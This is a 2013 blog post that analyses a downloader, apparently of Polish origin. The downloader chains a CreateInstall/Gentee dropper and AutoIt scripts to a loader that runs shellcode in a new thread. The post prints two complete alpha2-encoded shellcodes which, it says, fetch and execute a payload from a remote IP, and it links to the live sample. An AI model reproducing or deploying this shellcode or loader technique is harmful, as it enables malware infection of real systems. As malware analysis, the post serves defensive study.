Sunday, January 20, 2013

#4 Analysis of an uncommon Downloader

This will be a quick analysis of a Downloader I recently came across (thanks to Artem for providing the sample!). What makes this malware special is the uncommon programming language which it uses to accomplish its tasks (actually a scripting language). The malware itself is very rudimentary, only the actual Downloader (spawns a shellcode) is a bit more advanced. Unfortunately the server isn't responding to the requests from the Downloader, so it is unclear what final purpose this malware has. I think the scripting languages and the shellcode were chosen to evade AV (heuristic) detections. The detection rates of the Dropper are still very low (6/46), even 2 years after its creation:

https://www.virustotal.com/file/5cc4dde981052073f4ddef5d67d0bf5d38a2777d7ed810f97b69b8e3c8e5b776/analysis/

I haven't uploaded the dropped files, but I guess detections rates are also very low if at all. This task is left to the reader. ;-)

What is interesting about this malware:
- Makes use of Gentee scripting language (actually uses CreateInstall, which was coded in Gentee)
- Makes use of AutoIt scripting language
- Spawns a shell to download additional component(s)

A dynamic analysis of this malware can be found at malwr.com:
http://malwr.com/analysis/dbabce375de619916e727d24679c6bd3

I try to give some additional information, so let's start with the Dropper.

Note: All files of this malware have the extension ".com", but they are all .exe files (just renamed to .com).


Dropper

Sample: sample.exe
Size: 785.742 Bytes
Timestamp: 31.01.2011 17:44:13
MD5: DBABCE375DE619916E727D24679C6BD3
SHA1: D8C7EF587EAB81C1BBC79AA695F5F7FF319F0484

The sample can be downloaded at kernelmode.info: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2445

The Dropper was created with CreateInstall tool (www.createinstall.com) and consists of multiple files. CreateInstall itself is written in Gentee programming language, which is actually a scripting language. Gentee programs can be bundled into standalone .exe files and are interpreted at runtime by the Gentee Interpreter (genteert.dll and guig.dll). The Dropper creates the following files and folders in the Windows Temp folder:

- ...Temp\genteert.dll
- ...Temp\genteeXX.tmp (XX stands for random Hexbytes)
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\Symantec\aqq1.com
- ...Temp\Symantec\faktura_scan535624.jpg
- ...Temp\Symantec\inct.com

Thereafter the file inct.com is executed and the following files are deleted again:

- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\genteeXX.tmp
- ...Temp\genteert.dll


inct.com

This file is a compiled AutoIt script, which by default is packed with UPX. After unpacking it, we can load the executable into an AutoIt decompiler (e.g. www.exe2aut.com) to see that this file just shows the picture "faktura_scan535624.jpg" (see above) and runs the file "aqq1.com" (see above). The picture shows a polish bill of sale from the product from the website fakturki.pl.


aqq1.com

This file was (also) created with CreateInstall and drops the following files and folders into Windows Temp and Autostart folder:

- ...Temp\genteert.dll
- ...Temp\genteeXX.tmp
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\Symantec\jqs.com
- ...\Autostart\Symantec.com

Then it runs the file "Symantec.com" and deletes the following files and folders:

- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\genteeXX\
- ...Temp\genteeXX.tmp
- ...Temp\genteert.dll


Symantec.com

This is another AutoIt script compiled into a standalone .exe file. It starts the dropped file "jqs.com" with one of the following two parameters (alphanumeric shellcodes, encoded with alpha2 - see http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2):

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLkXmYC0uPWpu0ni8e4qjrbDNkRrTpLKf2dLLKF25DLKBRDh4OX7SzevTqIovQIPNLgLCQCL7r6LGPo18OFm5Qjg8bL0CbRwNkPRfpLKrbElC1jpnkg0qhNeiPt4aZGqXPpPLKPHB8NkBx10faKcYsGLaYLKfTLKwqKf6QyoEaYPnLKqzo4MVaO7p8m0qeJTvc1mIhUkqm4dSEyrChnkrxGTc1HSpfnkVl2klKshwlwqJsLK34NkGqzpmYW44d5tckaKsQ3ipZv19oKP681OPZnkdRhkk6SmaxpnU5SDs0rH3GbI2NRI2trHRlD7dfwwKOhUVQYoF7F7CgqGsZ3064phvZaFpyY7ioyEJKcoQKTqHIRqPQ3Z332qf1CXoK31s05Pv3V0cX0WNioo9VIoJuxk78SivQyBcbu830drY0LDcbv2qB0Qbr60rHXkBu6NGKyo8ULIkv0jdPCk58K0GCePWpNi9p1zWtpPPj7o1FcXt5qVOnk69ozuEaYof7RwpWf7V6bHtmdFuHsKioN5ouYPpugjRkqdVpJK9EZKSyxhLsIoKOkO6O3tPn1DRv5P30e8zPoEORCfyojucZw03XePdP7p5PSXEPS0705PrwPhSh94f3kUkOIEmCV3RsK9IwF7rHC07P5P5PF3aFu8b2LVOyhb9o9EoukpadJmLKC7UQO3lEo0BUxerxiSjH61IoIoio5atxudTn6XVRfNVQGIFNea6PgCs0AA

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHK9C0c0c03Pk9IuP18Rpdnkv2dpNkcb6lnkrrR4NkcBthFoMgszDfeaiodqo0LlGLsQsLVbfLwPIQHOvm5Qo7jBhpRrbwnkf2DPlKqR7LvaN0NkG0CHOu9PrTaZ5QHPpPnk1X7hnk1H10C1N3xc7L3ylKgDLKEQN6tq9ouaIPllZaHOfmUQKwVXiprUZTuScMYh7KQmQ40um22xlKBxFD5QYCe6nkvlbkNk2x7lFaJsNkfdlK31jpMYctutfDQKCkU1f9rzsaKOM0v8so2zlKB2ZKlF3mBHRNQurTePCXt7CYBNqyV42HRlcGfFs7kOhU01iov7Rwf7bwRJuPv4QxwJaFqimwyoXUHkRkckuahIpQ0Q1z5Sv12qSX2peP5P5PaCv0PhcgNiOoZfioN5xkdtqI6QhRf2E8WpTBa0nd3b0Rf2pQF2PPe8ZKcedngKiojumY9VPjTP3kUaIoV7CgV7cgaFBHFMs6eHSKioXUNekpSEGjBkSDfp8kM9xk1YM8XGkOkOioDoPNPi5gPnWpGpe88pX5mrPVIoHU2JQPph7pTPwpwp585Pc0cps0QGU8rxOTqCkUYoxUNssc0SmYiwPWbHc010wpC0V3pV58Frz6K9kRIoXUOuiPPtJmLKdGvajcNekpD5herxYSm82EyoYoioTqGHFTdnGH4rDnUagIvNeatpVSePAA

It first checks if the passed days of the current year reached the number 100. If so, jqs.com with the first shellcode is started and then Symantec.com sleeps for a minute. Then a file named "jar_cache879799398409779005999.tmp" is searched in Temp folder and gets deleted if found. I don't know why this "Java file" is searched and deleted, but it is probably the file that gets downloaded or dropped from the downloaded file. Another possibility is that the malware is launched by a Java Applet or a Java exploit. If this Java file isn't found, jqs.com is started with the second shellcode. Then again it sleeps for a minute, searches for the same "Java file" and deletes it.
Figure 3: Symantec.com sourcecode

There are two polish words as function names in the script ("uruchom" = "launch" and "sprzatanie" = "cleanup"). Together with the picture (see above), I think the malware's creator is from poland or polish speaking.


jqs.com

This file was also packed with UPX. This file launches one of the above shellcodes within a new Thread to connect to server at 184.82.19.103. It does this by allocating a memory buffer (VirtualAlloc()) and storing the passed parameter (shellcode) into it. Then the pointer of the buffer is passed as lpParameter to the CreateThread() API function. The new Thread uses the pointer to call the shellcode (call eax).

Figure 2: Call to shellcode
The shell dynamically resolves some Windows API functions to call them afterwards. It requests data from the server (InternetReadFile()), to copy it into a buffer (VirtualAlloc()) and passing execution to it. As mentioned at the beginning, the server isn't responding, so it's not possible to get more information of the downloaded data (another file or shellcode).

Figure 3: Alphanumeric encoded shellcode

That's all.

Now I need a Re-Neducation :-)

No comments:

Post a Comment